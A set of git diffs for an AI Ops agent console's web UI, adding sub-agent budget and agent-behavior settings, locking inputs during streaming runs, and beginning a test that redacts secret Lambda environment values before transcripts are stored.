+++ b/apps/web-ui/components/agent/workspace/__tests__/agent-turn.test.tsx
@@ -19,6 +19,7 @@ const EMPTY_RUN_STATE: RunState = {
   hasStructuredData: false,
   hasApprovalData: false,
   tokenUsage: { input: 0, output: 0 },
+  subagents: [],
 }
 
 function baseProps(events: TranscriptEvent[]) {

--- a/apps/web-ui/components/agent/workspace/__tests__/agent-turn.test.tsx
+++ b/apps/web-ui/components/agent/workspace/__tests__/agent-turn.test.tsx
@@ -20,6 +20,7 @@ const EMPTY_RUN_STATE: RunState = {
   hasApprovalData: false,
   tokenUsage: { input: 0, output: 0 },
   subagents: [],
+  usedSubagents: false,
 }
 
 function baseProps(events: TranscriptEvent[]) {

--- a/apps/web-ui/components/agent/workspace/__tests__/transcript-header.test.tsx
+++ b/apps/web-ui/components/agent/workspace/__tests__/transcript-header.test.tsx
@@ -242,6 +242,24 @@ describe('TranscriptHeader', () => {
     expect(onMenuAction).toHaveBeenCalledWith('export-md')
   })
 
+  // Sub-agent (and future AI Ops) configuration opens from the console itself —
+  // there is deliberately no sidebar nav entry for it.
+  it('offers an "AI Ops settings" menu item that fires the settings action', async () => {
+    const onMenuAction = vi.fn()
+    render(
+      <TranscriptHeader
+        title="Run"
+        runState={EMPTY_RUN_STATE}
+        isStreaming={false}
+        elapsedMs={null}
+        onMenuAction={onMenuAction}
+      />
+    )
+    fireEvent.keyDown(screen.getByRole('button', { name: /more actions/i }), { key: 'Enter' })
+    fireEvent.click(await screen.findByText('AI Ops settings'))
+    expect(onMenuAction).toHaveBeenCalledWith('settings')
+  })
+
   it('offers transcript-PDF and report-PDF export menu items', async () => {
     const onMenuAction = vi.fn()
     render(

--- a/apps/web-ui/components/agent/workspace/__tests__/transcript-header.test.tsx
+++ b/apps/web-ui/components/agent/workspace/__tests__/transcript-header.test.tsx
@@ -31,6 +31,7 @@ const EMPTY_RUN_STATE: RunState = {
   hasApprovalData: false,
   tokenUsage: { input: 0, output: 0 },
   subagents: [],
+  usedSubagents: false,
 }
 
 function planOf(doneCount: number, total: number): RunState['plan'] {

--- a/apps/web-ui/components/agent/workspace/__tests__/transcript-header.test.tsx
+++ b/apps/web-ui/components/agent/workspace/__tests__/transcript-header.test.tsx
@@ -30,6 +30,7 @@ const EMPTY_RUN_STATE: RunState = {
   hasStructuredData: false,
   hasApprovalData: false,
   tokenUsage: { input: 0, output: 0 },
+  subagents: [],
 }
 
 function planOf(doneCount: number, total: number): RunState['plan'] {

--- a/apps/web-ui/components/agent/workspace/composer.tsx
+++ b/apps/web-ui/components/agent/workspace/composer.tsx
@@ -86,6 +86,9 @@ export function Composer({
 
   const isEmpty = !value.trim();
   const canSubmit = !isEmpty && !disabled && !isStreaming;
+  // While a run is streaming, EVERY input is locked except the Stop button —
+  // an accidental Enter or picker change mid-run must not start/alter a chat.
+  const locked = disabled || isStreaming;
 
   const handleKeyDown = (e: React.KeyboardEvent<HTMLTextAreaElement>) => {
     // Enter submits; Shift+Enter inserts a newline; an in-progress IME
@@ -104,9 +107,9 @@ export function Composer({
     <div className="rounded-xl border bg-card shadow-sm transition-all focus-within:ring-1 focus-within:ring-ring">
       {/* Chips row — account/model/skill, removable */}
       <div className="flex flex-wrap items-center gap-1.5 px-3 pt-2.5">
-        <AccountChip field={context.accounts} disabled={disabled} />
-        <ModelChip field={context.model} disabled={disabled} />
-        <SkillChip field={context.skill} disabled={disabled} />
+        <AccountChip field={context.accounts} disabled={locked} />
+        <ModelChip field={context.model} disabled={locked} />
+        <SkillChip field={context.skill} disabled={locked} />
       </div>
 
       {/* Textarea */}
@@ -117,7 +120,7 @@ export function Composer({
           onChange={(e) => onChange(e.target.value)}
           onKeyDown={handleKeyDown}
           placeholder="Ask the agent to plan, execute, reflect, and revise..."
-          disabled={disabled}
+          disabled={locked}
           data-testid="composer-input"
           rows={1}
           maxLength={MAX_CHARS}
@@ -134,7 +137,7 @@ export function Composer({
                 type="button"
                 variant="ghost"
                 size="icon"
-                disabled={disabled}
+                disabled={locked}
                 className="h-7 w-7 rounded-md text-muted-foreground hover:text-foreground"
                 aria-label="Add knowledge, tools, or attachments"
               >
@@ -142,13 +145,13 @@ export function Composer({
               </Button>
             </PopoverTrigger>
             <PopoverContent side="top" align="start" className="w-72 space-y-3 p-3">
-              <KbSection field={context.kb} disabled={disabled} />
-              <ToolsSection field={context.tools} disabled={disabled} />
+              <KbSection field={context.kb} disabled={locked} />
+              <ToolsSection field={context.tools} disabled={locked} />
               <div className="space-y-1.5 border-t pt-2">
                 <p className="text-[10px] font-semibold uppercase tracking-wider text-muted-foreground">
                   Attach images
                 </p>
-                <FileUpload files={attachments} onFilesChange={onAttach} disabled={disabled} />
+                <FileUpload files={attachments} onFilesChange={onAttach} disabled={locked} />
               </div>
             </PopoverContent>
           </Popover>
@@ -175,7 +178,7 @@ export function Composer({
                 type="button"
                 variant="ghost"
                 size="sm"
-                disabled={disabled}
+                disabled={locked}
                 className="h-7 gap-1 px-2 text-xs text-muted-foreground hover:text-foreground"
               >
                 <Settings2 className="h-3 w-3" />
@@ -185,7 +188,7 @@ export function Composer({
             <PopoverContent side="top" align="end" className="w-64 space-y-3 p-3">
               <div className="space-y-1.5">
                 <Label className="text-xs font-medium">Mode</Label>
-                <Select value={mode} onValueChange={onModeChange} disabled={disabled}>
+                <Select value={mode} onValueChange={onModeChange} disabled={locked}>
                   <SelectTrigger className="h-8 text-xs">
                     <SelectValue placeholder="Mode" />
                   </SelectTrigger>
@@ -210,7 +213,7 @@ export function Composer({
                   id="composer-auto-approve"
                   checked={autoApprove}
                   onCheckedChange={onAutoApproveChange}
-                  disabled={disabled}
+                  disabled={locked}
                 />
               </div>
               <div className="flex items-center justify-between gap-2">
@@ -221,7 +224,7 @@ export function Composer({
                   id="composer-show-tools"
                   checked={showTools}
                   onCheckedChange={onShowToolsChange}
-                  disabled={disabled}
+                  disabled={locked}
                 />
               </div>
               <div className="flex items-center justify-between gap-2">
@@ -236,7 +239,7 @@ export function Composer({
                   id="composer-auto-skills"
                   checked={autoLoadSkills}
                   onCheckedChange={onAutoLoadSkillsChange}
-                  disabled={disabled}
+                  disabled={locked}
                 />
               </div>
             </PopoverContent>
@@ -245,7 +248,7 @@ export function Composer({
           <MicButton
             value={value}
             onChange={onChange}
-            disabled={disabled || isStreaming}
+            disabled={locked}
             maxLength={MAX_CHARS}
           />
 
@@ -256,7 +259,7 @@ export function Composer({
               size="icon"
               data-testid="composer-enhance-button"
               onClick={onEnhance}
-              disabled={isEmpty || disabled || isStreaming || isEnhancing}
+              disabled={isEmpty || locked || isEnhancing}
               aria-label="Enhance prompt with AI"
               title="Enhance prompt with AI"
               className={cn(

--- a/apps/web-ui/components/agent/workspace/events/tool-row.tsx
+++ b/apps/web-ui/components/agent/workspace/events/tool-row.tsx
@@ -1,7 +1,7 @@
 "use client"
 
 import * as React from "react"
-import { ChevronDown, Terminal, FileText, FilePen, BookOpen, Wrench, Check, X } from "lucide-react"
+import { ChevronDown, Terminal, FileText, FilePen, BookOpen, Bot, Wrench, Check, X } from "lucide-react"
 import type { TranscriptEvent } from "@/lib/agent-chat/events"
 import type { ToolGroup } from "@/lib/agent-chat/group-events"
 import { Collapsible, CollapsibleTrigger, CollapsibleContent } from "@/components/ui/collapsible"
@@ -15,6 +15,7 @@ const TOOL_ICONS: Record<string, React.ComponentType<{ className?: string }>> = 
   read_file: FileText,
   write_file: FilePen,
   search_knowledge_base: BookOpen,
+  dispatch_agent: Bot,
 }
 
 function toolIcon(toolName: string): React.ComponentType<{ className?: string }> {

--- a/apps/web-ui/components/agent/workspace/session-view.tsx
+++ b/apps/web-ui/components/agent/workspace/session-view.tsx
@@ -369,7 +369,7 @@ export function SessionView({ threadId, ownerUserId, active, onStatusChange, onT
           )}
         >
           <div className="h-full w-72 xl:w-80">
-            <RunRail runState={runState} isStreaming={isStreaming} context={pickers.railContext} />
+            <RunRail runState={runState} isStreaming={isStreaming} context={pickers.railContext} threadId={threadId} />
           </div>
         </div>
       </div>

--- a/apps/web-ui/components/agent/workspace/session-view.tsx
+++ b/apps/web-ui/components/agent/workspace/session-view.tsx
@@ -20,6 +20,9 @@ import { useDistillSkill } from "@/lib/queries/skills";
 import { useDistillScheduledTask } from "@/lib/queries/agent-ops-scheduled-tasks";
 import { SCHEDULED_TASK_PREFILL_KEY } from "@/components/agent-ops/scheduled-task-dialog";
 import { SkillFormDialog } from "@/components/skills/skill-form-dialog";
+import { AiopsSubagentSettings } from "@/components/settings/aiops-subagent-settings";
+import { AiopsFeatureSettings } from "@/components/settings/aiops-feature-settings";
+import { Dialog, DialogContent, DialogTitle } from "@/components/ui/dialog";
 import type { FileAttachment } from "@/components/agent/file-upload";
 import { Spinner } from "@/components/ui/spinner";
 import { Transcript } from "./transcript";
@@ -202,6 +205,9 @@ export function SessionView({ threadId, ownerUserId, active, onStatusChange, onT
   const distillSkill = useDistillSkill();
   const distillScheduledTask = useDistillScheduledTask();
   const [skillDialogOpen, setSkillDialogOpen] = useState(false);
+  // AI Ops settings (sub-agent budget etc.) live IN the console — opened from
+  // the header overflow menu, not a sidebar nav entry.
+  const [settingsOpen, setSettingsOpen] = useState(false);
   const [skillDraft, setSkillDraft] = useState<
     { name: string; description: string; tier: string; content: string } | null
   >(null);
@@ -269,6 +275,9 @@ export function SessionView({ threadId, ownerUserId, active, onStatusChange, onT
           break;
         case "skill":
           void handleSaveAsSkill();
+          break;
+        case "settings":
+          setSettingsOpen(true);
           break;
         case "clear":
           handleClear();
@@ -380,6 +389,18 @@ export function SessionView({ threadId, ownerUserId, active, onStatusChange, onT
         initialDraft={skillDraft}
         sourceRunId={threadId}
       />
+
+      {/* AI Ops settings — the console owns its own configuration. */}
+      <Dialog open={settingsOpen} onOpenChange={setSettingsOpen}>
+        <DialogContent className="max-h-[85vh] max-w-2xl overflow-y-auto" data-testid="aiops-settings-dialog">
+          {/* The panels render their own headings; this title exists for a11y. */}
+          <DialogTitle className="sr-only">AI Ops settings</DialogTitle>
+          <div className="space-y-6">
+            <AiopsFeatureSettings />
+            <AiopsSubagentSettings />
+          </div>
+        </DialogContent>
+      </Dialog>
     </div>
   );
 }

--- a/apps/web-ui/components/agent/workspace/transcript-header.tsx
+++ b/apps/web-ui/components/agent/workspace/transcript-header.tsx
@@ -12,7 +12,7 @@ import {
 import type { RunState } from "@/components/agent/chat/run-state";
 import { formatTokens } from "@/lib/agent-chat/token-usage";
 
-export type TranscriptMenuAction = "export-report" | "export-md" | "export-pdf" | "copy" | "schedule" | "skill" | "clear";
+export type TranscriptMenuAction = "export-report" | "export-md" | "export-pdf" | "copy" | "schedule" | "skill" | "settings" | "clear";
 
 export interface TranscriptHeaderProps {
   title: string;
@@ -52,6 +52,7 @@ const MENU_ITEMS: Array<{ action: TranscriptMenuAction; label: string }> = [
   { action: "copy", label: "Copy" },
   { action: "schedule", label: "Convert to scheduled task" },
   { action: "skill", label: "Save as skill" },
+  { action: "settings", label: "AI Ops settings" },
   { action: "clear", label: "Clear" },
 ];
 

--- a/apps/web-ui/components/settings/aiops-feature-settings.tsx
+++ b/apps/web-ui/components/settings/aiops-feature-settings.tsx
@@ -1,0 +1,161 @@
+'use client';
+
+/**
+ * AI Ops feature settings card — the tenant-facing switchboard for behaviors
+ * that used to be env-var kill-switches (chat triage, the memory subsystems,
+ * autonomous skill creation, the run iteration cap). Entirely UI-driven; the
+ * server clamps numeric values against FEATURE_BOUNDS on read and write.
+ *
+ * Rendered next to AiopsSubagentSettings in the AI Ops console settings dialog
+ * and on the /app/agent-ops/settings/subagents page.
+ */
+import { useEffect, useState } from 'react';
+import { toast } from 'sonner';
+
+import { Button } from '@/components/ui/button';
+import { Card, CardContent, CardDescription, CardHeader, CardTitle } from '@/components/ui/card';
+import { Input } from '@/components/ui/input';
+import { Label } from '@/components/ui/label';
+import { Switch } from '@/components/ui/switch';
+import { Spinner } from '@/components/ui/spinner';
+import {
+  useAiopsSubagentSettings,
+  useSaveAiopsFeatureSettings,
+  type AiopsFeatureConfig,
+} from '@/lib/queries/aiops-settings';
+
+const TOGGLES: Array<{ key: keyof AiopsFeatureConfig; label: string; help: string }> = [
+  {
+    key: 'chatTriageEnabled',
+    label: 'Smart routing (chat triage)',
+    help: 'One quick classifier call answers greetings/small talk directly and routes real work to the full agent — it also auto-picks the matching skill. Off: every message runs the whole planning graph.',
+  },
+  {
+    key: 'workingMemoryEnabled',
+    label: 'Working memory',
+    help: 'Compacts long runs in-session (summary folding) so the agent keeps its train of thought within the context budget.',
+  },
+  {
+    key: 'episodicMemoryEnabled',
+    label: 'Episodic memory',
+    help: 'Distills one episode (context → actions → outcome) per tool-using run and replays similar past sessions as experience.',
+  },
+  {
+    key: 'proceduralMemoryEnabled',
+    label: 'Procedural memory',
+    help: 'Learns operating rules from corrections and failures, injected as "Operating rules (learned)" on later runs.',
+  },
+  {
+    key: 'memoryReconcileEnabled',
+    label: 'Memory reconciliation',
+    help: 'An LLM judge merges new facts into existing memories (update/supersede) instead of piling up near-duplicates.',
+  },
+  {
+    key: 'autoSkillCreationEnabled',
+    label: 'Autonomous skill creation',
+    help: 'When a domain accumulates enough matured rules, the system authors a read-only sys- skill from them. Disabling a created skill vetoes it.',
+  },
+];
+
+const NUMBERS: Array<{ key: 'autoSkillMaturityThreshold' | 'skillSynthesisMinRules' | 'maxIterations'; label: string; help: string }> = [
+  {
+    key: 'maxIterations',
+    label: 'Max iterations per run',
+    help: 'Executor loop cap for a single run (planning and fast agents). Higher = more thorough and more expensive.',
+  },
+  {
+    key: 'autoSkillMaturityThreshold',
+    label: 'Rule maturity threshold',
+    help: 'Times a learned rule must be recalled before it counts as matured.',
+  },
+  {
+    key: 'skillSynthesisMinRules',
+    label: 'Matured rules per auto-skill',
+    help: 'Matured rules a domain needs before an autonomous skill is synthesized.',
+  },
+];
+
+export function AiopsFeatureSettings() {
+  const { data, isLoading } = useAiopsSubagentSettings();
+  const saveMutation = useSaveAiopsFeatureSettings();
+  const [draft, setDraft] = useState<AiopsFeatureConfig | null>(null);
+
+  // Initialize the draft once from the server value; later refetches must not
+  // clobber unsaved edits.
+  useEffect(() => {
+    if (data?.features && !draft) setDraft(data.features);
+  }, [data, draft]);
+
+  if (isLoading || !draft) {
+    return (
+      <div className="flex items-center gap-2 py-6 text-sm text-muted-foreground">
+        <Spinner size="sm" label="Loading AI Ops settings" /> Loading…
+      </div>
+    );
+  }
+
+  const bounds = data?.featureBounds;
+
+  const save = () => {
+    saveMutation.mutate(draft, {
+      onSuccess: (saved) => {
+        setDraft(saved);
+        toast.success('AI Ops settings saved', {
+          description: 'Applied to new runs immediately on this instance; within ~30s everywhere.',
+        });
+      },
+      onError: (err) => toast.error('Could not save AI Ops settings', { description: err.message }),
+    });
+  };
+
+  return (
+    <Card data-testid="aiops-feature-settings">
+      <CardHeader>
+        <CardTitle>Agent behavior</CardTitle>
+        <CardDescription>
+          Routing, memory, and skill-learning features for this organization. All settings live
+          here — no server configuration involved.
+        </CardDescription>
+      </CardHeader>
+      <CardContent className="space-y-5">
+        {TOGGLES.map(({ key, label, help }) => (
+          <div key={key} className="flex items-start justify-between gap-4">
+            <div className="space-y-0.5">
+              <Label htmlFor={`feat-${key}`}>{label}</Label>
+              <p className="text-xs text-muted-foreground">{help}</p>
+            </div>
+            <Switch
+              id={`feat-${key}`}
+              checked={draft[key] as boolean}
+              onCheckedChange={(checked) => setDraft({ ...draft, [key]: checked })}
+            />
+          </div>
+        ))}
+
+        <div className="grid gap-4 border-t pt-4 sm:grid-cols-3">
+          {NUMBERS.map(({ key, label, help }) => (
+            <div key={key} className="space-y-1">
+              <Label htmlFor={`feat-${key}`}>{label}</Label>
+              <Input
+                id={`feat-${key}`}
+                type="number"
+                min={bounds?.[key]?.min}
+                max={bounds?.[key]?.max}
+                value={draft[key]}
+                onChange={(e) => setDraft({ ...draft, [key]: Number(e.target.value) })}
+              />
+              <p className="text-xs text-muted-foreground">
+                {help}
+                {bounds?.[key] ? ` (${bounds[key].min}–${bounds[key].max})` : ''}
+              </p>
+            </div>
+          ))}
+        </div>
+
+        <Button type="button" onClick={save} disabled={saveMutation.isPending}>
+          {saveMutation.isPending ? <Spinner size="sm" label="Saving" /> : 'Save behavior settings'}
+        </Button>
+      </CardContent>
+    </Card>
+  );
+}

--- a/apps/web-ui/components/settings/aiops-subagent-settings.tsx
+++ b/apps/web-ui/components/settings/aiops-subagent-settings.tsx
@@ -5,7 +5,7 @@ import { useForm } from 'react-hook-form';
 import { zodResolver } from '@hookform/resolvers/zod';
 import { z } from 'zod';
 import { toast } from 'sonner';
-import { Bot, Gauge, Loader2, Save } from 'lucide-react';
+import { Bot, Gauge, Save } from 'lucide-react';
 
 import {
   useAiopsSubagentSettings,
@@ -102,6 +102,12 @@ export function AiopsSubagentSettings() {
   const platformEnabled = data?.platformEnabled ?? false;
   const bounds = data?.bounds;
 
+  // Zod rejects a blank number input as NaN before onSubmit ever runs. Without an
+  // invalid handler the click is a silent no-op with zero feedback, so surface it.
+  const onInvalid = () => {
+    toast.error('Some values are invalid — check the highlighted fields.');
+  };
+
   const onSubmit = async (values: FormValues) => {
     // Bounds are enforced server-side too; this only produces a friendlier message.
     for (const field of FIELDS) {
@@ -121,7 +127,7 @@ export function AiopsSubagentSettings() {
   };
 
   return (
-    <form onSubmit={form.handleSubmit(onSubmit)} className="flex-1 max-w-3xl mx-auto space-y-6">
+    <form onSubmit={form.handleSubmit(onSubmit, onInvalid)} className="flex-1 max-w-3xl mx-auto space-y-6">
       <div>
         <h1 className="text-2xl font-bold">Sub-Agents</h1>
         <p className="text-muted-foreground mt-1">
@@ -134,8 +140,8 @@ export function AiopsSubagentSettings() {
       {!platformEnabled && (
         <Alert>
           <AlertDescription>
-            Sub-agents are disabled for this deployment. These settings are saved but will not take
-            effect until an administrator enables the feature.
+            Sub-agents are disabled for this deployment, so these settings are read-only. An
+            administrator must enable the feature before they can be changed.
           </AlertDescription>
         </Alert>
       )}
@@ -195,6 +201,11 @@ export function AiopsSubagentSettings() {
                     Allowed: {bound.min}–{bound.max}. Default {bound.default}.
                   </p>
                 )}
+                {form.formState.errors[field.name] && (
+                  <p className="text-xs text-destructive">
+                    Enter a whole number between {bound?.min} and {bound?.max}.
+                  </p>
+                )}
               </div>
             );
           })}
@@ -203,7 +214,7 @@ export function AiopsSubagentSettings() {
 
       <Button type="submit" disabled={saveMutation.isPending || !platformEnabled}>
         {saveMutation.isPending ? (
-          <Loader2 className="h-4 w-4 mr-2 animate-spin" />
+          <Spinner className="h-4 w-4 mr-2" />
         ) : (
           <Save className="h-4 w-4 mr-2" />
         )}

--- a/apps/web-ui/components/settings/aiops-subagent-settings.tsx
+++ b/apps/web-ui/components/settings/aiops-subagent-settings.tsx
@@ -1,0 +1,214 @@
+'use client';
+
+import { useEffect } from 'react';
+import { useForm } from 'react-hook-form';
+import { zodResolver } from '@hookform/resolvers/zod';
+import { z } from 'zod';
+import { toast } from 'sonner';
+import { Bot, Gauge, Loader2, Save } from 'lucide-react';
+
+import {
+  useAiopsSubagentSettings,
+  useSaveAiopsSubagentSettings,
+  type SubagentBudget,
+} from '@/lib/queries/aiops-settings';
+import { Button } from '@/components/ui/button';
+import { Card, CardContent, CardDescription, CardHeader, CardTitle } from '@/components/ui/card';
+import { Input } from '@/components/ui/input';
+import { Label } from '@/components/ui/label';
+import { Switch } from '@/components/ui/switch';
+import { Alert, AlertDescription } from '@/components/ui/alert';
+import { Spinner } from '@/components/ui/spinner';
+
+const schema = z.object({
+  enabled: z.boolean(),
+  maxConcurrentSubagents: z.number().int(),
+  maxSubagentsPerRun: z.number().int(),
+  maxSubagentTokensPerRun: z.number().int(),
+  subagentMaxIterations: z.number().int(),
+  subagentTimeoutMs: z.number().int(),
+});
+
+type FormValues = z.infer<typeof schema>;
+
+const FIELDS: Array<{
+  name: keyof Omit<SubagentBudget, 'enabled'>;
+  label: string;
+  help: string;
+}> = [
+  {
+    name: 'maxConcurrentSubagents',
+    label: 'Concurrent sub-agents',
+    help: 'How many sub-agents may run at the same time. Higher finishes fan-out work faster but increases the chance of provider throttling.',
+  },
+  {
+    name: 'maxSubagentsPerRun',
+    label: 'Sub-agents per run',
+    help: 'Total sub-agents a single chat run may dispatch before it falls back to working serially.',
+  },
+  {
+    name: 'maxSubagentTokensPerRun',
+    label: 'Token budget per run',
+    help: 'Combined sub-agent token spend allowed in one run. When exhausted, the agent completes the work itself instead of failing.',
+  },
+  {
+    name: 'subagentMaxIterations',
+    label: 'Iterations per sub-agent',
+    help: 'Reasoning/tool laps a single sub-agent may take before it must report what it has found.',
+  },
+  {
+    name: 'subagentTimeoutMs',
+    label: 'Sub-agent timeout (ms)',
+    help: 'Wall-clock limit for one sub-agent. On timeout it returns partial findings rather than failing the run.',
+  },
+];
+
+export function AiopsSubagentSettings() {
+  const { data, isLoading, error } = useAiopsSubagentSettings();
+  const saveMutation = useSaveAiopsSubagentSettings();
+
+  const form = useForm<FormValues>({
+    resolver: zodResolver(schema),
+    defaultValues: {
+      enabled: false,
+      maxConcurrentSubagents: 3,
+      maxSubagentsPerRun: 8,
+      maxSubagentTokensPerRun: 400000,
+      subagentMaxIterations: 8,
+      subagentTimeoutMs: 180000,
+    },
+  });
+
+  useEffect(() => {
+    if (data?.budget) form.reset(data.budget);
+  }, [data, form]);
+
+  if (isLoading) {
+    return (
+      <div className="flex-1 flex items-center justify-center py-12">
+        <Spinner />
+      </div>
+    );
+  }
+
+  if (error) {
+    return (
+      <Alert variant="destructive">
+        <AlertDescription>{(error as Error).message}</AlertDescription>
+      </Alert>
+    );
+  }
+
+  const platformEnabled = data?.platformEnabled ?? false;
+  const bounds = data?.bounds;
+
+  const onSubmit = async (values: FormValues) => {
+    // Bounds are enforced server-side too; this only produces a friendlier message.
+    for (const field of FIELDS) {
+      const bound = bounds?.[field.name];
+      const value = values[field.name];
+      if (bound && (value < bound.min || value > bound.max)) {
+        toast.error(`${field.label} must be between ${bound.min} and ${bound.max}`);
+        return;
+      }
+    }
+    try {
+      await saveMutation.mutateAsync(values);
+      toast.success('Sub-agent settings saved — new runs will use this configuration');
+    } catch (err) {
+      toast.error(err instanceof Error ? err.message : 'Failed to save sub-agent settings');
+    }
+  };
+
+  return (
+    <form onSubmit={form.handleSubmit(onSubmit)} className="flex-1 max-w-3xl mx-auto space-y-6">
+      <div>
+        <h1 className="text-2xl font-bold">Sub-Agents</h1>
+        <p className="text-muted-foreground mt-1">
+          Sub-agents let one AI Ops run investigate several accounts or regions at the same time.
+          They are read-only: anything that changes infrastructure still runs on the main agent
+          under your normal approval flow.
+        </p>
+      </div>
+
+      {!platformEnabled && (
+        <Alert>
+          <AlertDescription>
+            Sub-agents are disabled for this deployment. These settings are saved but will not take
+            effect until an administrator enables the feature.
+          </AlertDescription>
+        </Alert>
+      )}
+
+      <Card>
+        <CardHeader>
+          <CardTitle className="text-base flex items-center gap-2">
+            <Bot className="h-4 w-4" />
+            Enable sub-agents
+          </CardTitle>
+          <CardDescription>
+            When off, every run executes serially exactly as before.
+          </CardDescription>
+        </CardHeader>
+        <CardContent>
+          <div className="flex items-center gap-3">
+            <Switch
+              id="enabled"
+              checked={form.watch('enabled')}
+              onCheckedChange={(checked) => form.setValue('enabled', checked, { shouldDirty: true })}
+              disabled={!platformEnabled}
+            />
+            <Label htmlFor="enabled">Dispatch sub-agents for parallel investigation</Label>
+          </div>
+        </CardContent>
+      </Card>
+
+      <Card>
+        <CardHeader>
+          <CardTitle className="text-base flex items-center gap-2">
+            <Gauge className="h-4 w-4" />
+            Budget limits
+          </CardTitle>
+          <CardDescription>
+            These bound how much work and spend one run may fan out. Exceeding a limit never fails
+            the run — the agent finishes the work serially instead.
+          </CardDescription>
+        </CardHeader>
+        <CardContent className="space-y-5">
+          {FIELDS.map((field) => {
+            const bound = bounds?.[field.name];
+            return (
+              <div key={field.name} className="space-y-2">
+                <Label htmlFor={field.name}>{field.label}</Label>
+                <Input
+                  id={field.name}
+                  type="number"
+                  className="w-48"
+                  min={bound?.min}
+                  max={bound?.max}
+                  disabled={!platformEnabled}
+                  {...form.register(field.name, { valueAsNumber: true })}
+                />
+                <p className="text-xs text-muted-foreground">{field.help}</p>
+                {bound && (
+                  <p className="text-xs text-muted-foreground">
+                    Allowed: {bound.min}–{bound.max}. Default {bound.default}.
+                  </p>
+                )}
+              </div>
+            );
+          })}
+        </CardContent>
+      </Card>
+
+      <Button type="submit" disabled={saveMutation.isPending || !platformEnabled}>
+        {saveMutation.isPending ? (
+          <Loader2 className="h-4 w-4 mr-2 animate-spin" />
+        ) : (
+          <Save className="h-4 w-4 mr-2" />
+        )}
+        Save settings
+      </Button>
+    </form>
+  );
+}

--- a/apps/web-ui/components/settings/aiops-subagent-settings.tsx
+++ b/apps/web-ui/components/settings/aiops-subagent-settings.tsx
@@ -140,8 +140,10 @@ export function AiopsSubagentSettings() {
       {!platformEnabled && (
         <Alert>
           <AlertDescription>
-            Sub-agents are disabled for this deployment, so these settings are read-only. An
-            administrator must enable the feature before they can be changed.
+            Sub-agents are switched off for this whole deployment by the emergency kill-switch
+            (SUBAGENTS_ENABLED=false), so these settings are read-only until an administrator
+            removes it. In normal operation no environment variable is needed — the toggle
+            below is the only control.
           </AlertDescription>
         </Alert>
       )}

--- a/apps/web-ui/components/settings/aiops-subagent-settings.tsx
+++ b/apps/web-ui/components/settings/aiops-subagent-settings.tsx
@@ -214,7 +214,7 @@ export function AiopsSubagentSettings() {
 
       <Button type="submit" disabled={saveMutation.isPending || !platformEnabled}>
         {saveMutation.isPending ? (
-          <Spinner className="h-4 w-4 mr-2" />
+          <Spinner size="sm" className="mr-2" />
         ) : (
           <Save className="h-4 w-4 mr-2" />
         )}

--- a/apps/web-ui/env.ts
+++ b/apps/web-ui/env.ts
@@ -50,6 +50,13 @@ export const env = createEnv({
         LANGFUSE_SECRET_KEY: z.string().optional(),
         LLM_AUDIT: z.string().optional(),
         SKIP_AUDIT_LOGGING: z.string().optional(),
+        SUBAGENTS_ENABLED: z.string().optional(),
+        SUBAGENT_MAX_CONCURRENCY: z.string().optional(),
+        SUBAGENT_MAX_PER_RUN: z.string().optional(),
+        SUBAGENT_MAX_TOKENS_PER_RUN: z.string().optional(),
+        SUBAGENT_MAX_ITERATIONS: z.string().optional(),
+        SUBAGENT_TIMEOUT_MS: z.string().optional(),
+        TOOL_CONCURRENCY: z.string().optional(),
 
         // Storage
         APP_BUCKET_NAME: z.string().optional(),

--- a/apps/web-ui/env.ts
+++ b/apps/web-ui/env.ts
@@ -86,17 +86,10 @@ export const env = createEnv({
         WEBHOOK_SECRET: z.string().optional(),
 
         // Feature flags / misc
-        WORKING_MEMORY_ENABLED: z.string().optional(),
         WORKING_MEMORY_TOKEN_BUDGET: z.string().optional(),
         WORKING_MEMORY_KEEP_RECENT: z.string().optional(),
-        MEMORY_RECONCILE_ENABLED: z.string().optional(),
-        EPISODIC_MEMORY_ENABLED: z.string().optional(),
-        PROCEDURAL_MEMORY_ENABLED: z.string().optional(),
         MEMORY_LOG_VERBOSE: z.string().optional(),
         AUTO_SKILL_SELECTION_ENABLED: z.string().optional(),
-        AUTO_SKILL_CREATION_ENABLED: z.string().optional(),
-        AUTO_SKILL_MATURITY_THRESHOLD: z.string().optional(),
-        SKILL_SYNTHESIS_MIN_RULES: z.string().optional(),
         USE_PG_SCHEDULES: z.string().optional(),
         DUAL_WRITE_SCHEDULES: z.string().optional(),
         INTERNAL_API_KEY: z.string().optional(),

--- a/apps/web-ui/lib/agent-chat/use-chat-session-helpers.ts
+++ b/apps/web-ui/lib/agent-chat/use-chat-session-helpers.ts
@@ -4,10 +4,22 @@
 // The AI SDK surfaces HTTP failures as Error(message) where message is usually
 // the raw response body — our API routes return `{"error":"..."}` — sometimes
 // with surrounding text. Extract the human-readable server error when present.
+/**
+ * AI SDK stream-protocol violations ("text-delta for missing text part", bad
+ * chunk ordering, …). These are internal invariants, not something the user can
+ * act on from the raw wording — and the run's progress IS saved server-side, so
+ * point them at the recovery path instead of the protocol internals.
+ */
+const STREAM_PROTOCOL_ERROR =
+  /missing text part|text-(start|delta|end)" chunk|invalid chunk order/i;
+
 export function extractServerErrorMessage(error: unknown): string | null {
   const message =
     error instanceof Error ? error.message : typeof error === "string" ? error : "";
   if (!message.trim()) return null;
+  if (STREAM_PROTOCOL_ERROR.test(message)) {
+    return "The live stream was interrupted by a protocol error. The run's progress is saved — reload the thread to see its current state.";
+  }
   const jsonMatch = message.match(/\{[\s\S]*\}/);
   if (jsonMatch) {
     try {

--- a/apps/web-ui/lib/agent/__tests__/subagent-redact.test.ts
+++ b/apps/web-ui/lib/agent/__tests__/subagent-redact.test.ts
@@ -1,0 +1,148 @@
+/**
+ * Redaction at the persistence boundary.
+ *
+ * `aws_read` permits `lambda get-function-configuration`, which returns
+ * Environment.Variables in PLAINTEXT (see the NOTE in aws-read-tool.ts). Task 11
+ * persists sub-agent transcripts to Postgres for 30 days, so those values must be
+ * scrubbed before the write — not at the tool, and not at the call site.
+ */
+import { describe, it, expect } from 'vitest';
+
+import { REDACTED, redactTranscript } from '../subagent-redact';
+
+type Entry = { kind: 'ai' | 'tool'; name?: string; text: string };
+
+const entry = (text: string, name = 'aws_read'): Entry => ({ kind: 'tool', name, text });
+
+/** Everything the redactor produced, flattened, so a leak anywhere is caught. */
+const flatten = (value: unknown) => JSON.stringify(value);
+
+describe('redactTranscript — Environment.Variables (redact by location)', () => {
+    const lambdaConfig = JSON.stringify({
+        FunctionName: 'api-worker',
+        Environment: { Variables: { DB_PASSWORD: 'hunter2', LOG_LEVEL: 'debug' } },
+    });
+
+    it('replaces every value under Environment.Variables but keeps the keys', () => {
